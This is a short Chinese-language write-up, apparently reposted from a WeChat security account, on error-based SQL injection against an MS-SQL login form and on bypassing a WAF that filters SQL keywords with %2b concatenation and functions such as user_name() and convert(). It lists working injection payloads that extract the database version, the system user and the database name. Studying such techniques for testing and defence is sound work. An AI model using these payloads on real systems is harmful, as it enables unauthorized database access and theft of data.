sqli笔记-基于错误的SQL注入与WAF绕过
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
正文
测试的是登陆功能,此功能会向数据库发送查询的请求,这里我们仔细来看一下,获取我的数据并通过 POST 请求发送。
工具使用的是Burp Suite,这里拦截了请求并将其发送到repeater:
作为 SQL 查询的常规方法,首先需要使用单引号或双引号来进行测试:
email=qaramany'
查看响应,在第 4173 行收到此错误,因此我只是搜索此错误以获取有关与之交互的数据库的更多信息。
直接google搜索一下 error No.: 2147217900这个错误就会知道:
发现使用的是 MS-SQL 数据库进行了基于错误的 SQL 注入,比较麻烦的是暂时没找到任何漏洞利用;
因为这里针对“select”或“order by”等关键字有过滤,这意味着“+select”可能被过滤并返回 500 错误,这是经过50多次的重放,才弄清楚的WAF 逻辑;
所以不能注入一个" select "或" order by "或" group by " 或任何可选的基于错误的攻击向量,当你注入包含上述表达式的查询的时候通常被WAF拦截。
使用%2b字符连接字符串作为bypass。%2B是+的编码
因此,将它与特定函数调用的结果一起使用,这些函数调用会触发对所需数据的数据类型转换错误。
我们现在可以通过一些函数绕过。
类似下面的:
-
SUSER_NAME() -
USER_NAME() -
PERMISSIONS() -
DB_NAME() -
FILE_NAME() -
TYPE_NAME() -
COL_NAME()
payload如下:
qaramany'%2buser_name(@@version)
这个payload可以查出数据库的版本
-
qaramany: 这是我的名字 -
':触发错误的单引号 -
%2b:是+的编码 -
User_name():在寻找的数据上触发数据类型转换错误的函数调用
有时我们会得到500错误,所以基于相同的方法创建有效载荷
qaramany'%2buser_name(convert(int,(SYSTEM_USER)))--
这绕过了获取SYSTEM_USER的WAF
一些poc如下:
qaramany’%2buser_name(convert(int,(SESSION_USER))) —
qaramany’%2buser_name(UPPER(‘sql+tutorial+is+fun!’)) —
qaramany’%2buser_name(IIF(5=4,+’YES’,+’HackedBy_c0nqr0r&0x4m’)) —
qaramany’%2buser_name(convert(int,(db_name()))) —
总结
本文是针对 在注入" select "或" order by "或" group by " 或任何可选的基于错误的攻击向量的时候,被WAF拦截的时候的一些思路.
原文始发于微信公众号(迪哥讲事):sqli笔记-基于错误的SQL注入与WAF绕过
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论